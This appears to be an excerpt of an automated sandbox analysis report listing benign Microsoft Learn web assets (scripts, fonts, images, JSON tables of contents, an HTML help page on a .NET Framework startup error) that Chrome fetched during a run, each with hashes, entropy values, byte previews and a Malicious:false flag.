                                                                                                                                                                                                Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1432
                                                                                                                                                                                                Entropy (8bit):4.986131881931089
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1154
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):542
                                                                                                                                                                                                Entropy (8bit):7.525008956073429
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:XwtMJQx3erxu1xj/Clwc4oScxNjELRNkZV11NXG0DkIKiiUdquJ:XwtQQx3cu1x+lt/KLUVRQIKdUoc
                                                                                                                                                                                                MD5:47EA692771B52D1F17940D9029EEE0BA
                                                                                                                                                                                                SHA1:2492A8F904F39E819E9CDA65A6E0FCF9BA393645
                                                                                                                                                                                                SHA-256:F4E10ABED0FDCD5163DF4BD8CEB6871825C572C13A5D37FC8AC5D839EE9BA65E
                                                                                                                                                                                                SHA-512:A6D5E7ACEA30EF4E68519FF914D6A710BE627821BAAFDB53BA0A0AEA63FD180CDE65A0FC42FE96F99E9C0A275DA1AEA2B800377D3E1BA09099651DC65EB309D8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                                Preview:...........T.n.@..#..#s.~.Q.C.!.p..7D..J!..+..S..(..iT3.U../._n.x.....R..a..=..x9....m.C............w......;.....f.G....n7.c...........w....r......m8..m..2I...T./..y^q(.4:`$I..RL..Vb.K...(....S.y.JR.7<7...B\.....$g."...U.U,..1.D...p_A.....)....J.F..j-M.!nb.[..3>../.7.S0M|...[R}...uG..8..lH...I......D.fUr..(d1..B.Q...%.2.q`/.#&......G.~:...p..cB.J).3f.,e.|....0....1xU..n....iii....iX.<[g..c.Y..,.'.%.y..0z.s_..IF.q6l.9.....j.*"2...(".|.A\..I......N.+3.3&.i'....w|V..j..?..7c..."%K...".F|....w}....w..........
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):19696
                                                                                                                                                                                                Entropy (8bit):7.9898910353479335
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                                MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                                SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                                SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                                SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                                Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):33148
                                                                                                                                                                                                Entropy (8bit):4.917595394577667
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                                Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):35005
                                                                                                                                                                                                Entropy (8bit):7.980061050467981
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):13842
                                                                                                                                                                                                Entropy (8bit):7.802399161550213
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4897
                                                                                                                                                                                                Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):47062
                                                                                                                                                                                                Entropy (8bit):5.016115705165622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                                MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                                SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                                SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                                SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):3130
                                                                                                                                                                                                Entropy (8bit):4.790069981348324
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                                Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):18367
                                                                                                                                                                                                Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):13339
                                                                                                                                                                                                Entropy (8bit):7.683569563478597
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):18367
                                                                                                                                                                                                Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                                Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1154
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):542
                                                                                                                                                                                                Entropy (8bit):7.525008956073429
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:XwtMJQx3erxu1xj/Clwc4oScxNjELRNkZV11NXG0DkIKiiUdquJ:XwtQQx3cu1x+lt/KLUVRQIKdUoc
                                                                                                                                                                                                MD5:47EA692771B52D1F17940D9029EEE0BA
                                                                                                                                                                                                SHA1:2492A8F904F39E819E9CDA65A6E0FCF9BA393645
                                                                                                                                                                                                SHA-256:F4E10ABED0FDCD5163DF4BD8CEB6871825C572C13A5D37FC8AC5D839EE9BA65E
                                                                                                                                                                                                SHA-512:A6D5E7ACEA30EF4E68519FF914D6A710BE627821BAAFDB53BA0A0AEA63FD180CDE65A0FC42FE96F99E9C0A275DA1AEA2B800377D3E1BA09099651DC65EB309D8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........T.n.@..#..#s.~.Q.C.!.p..7D..J!..+..S..(..iT3.U../._n.x.....R..a..=..x9....m.C............w......;.....f.G....n7.c...........w....r......m8..m..2I...T./..y^q(.4:`$I..RL..Vb.K...(....S.y.JR.7<7...B\.....$g."...U.U,..1.D...p_A.....)....J.F..j-M.!nb.[..3>../.7.S0M|...[R}...uG..8..lH...I......D.fUr..(d1..B.Q...%.2.q`/.#&......G.~:...p..cB.J).3f.,e.|....0....1xU..n....iii....iX.<[g..c.Y..,.'.%.y..0z.s_..IF.q6l.9.....j.*"2...(".|.A\..I......N.+3.3&.i'....w|V..j..?..7c..."%K...".F|....w}....w..........
                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                File Type:gzip compressed data, from TOPS/20, original size modulo 2^32 3130
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):946
                                                                                                                                                                                                Entropy (8bit):7.7735081104808375
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:XoFj+NjcAuGS4WhDcD1RkMO/Bpus+3HSNvW3:XoFjecAFugd++3HSe
                                                                                                                                                                                                MD5:A4DA4EFD33F23FB0A9FFFD2A7239E40B
                                                                                                                                                                                                SHA1:F304C50F97A3A679E65C43085393B6DBA985451F
                                                                                                                                                                                                SHA-256:07749F0F0C1F3D0AC2D9660F616EF3DAD11B823D5AB63ED49D0668C9FC2946B6
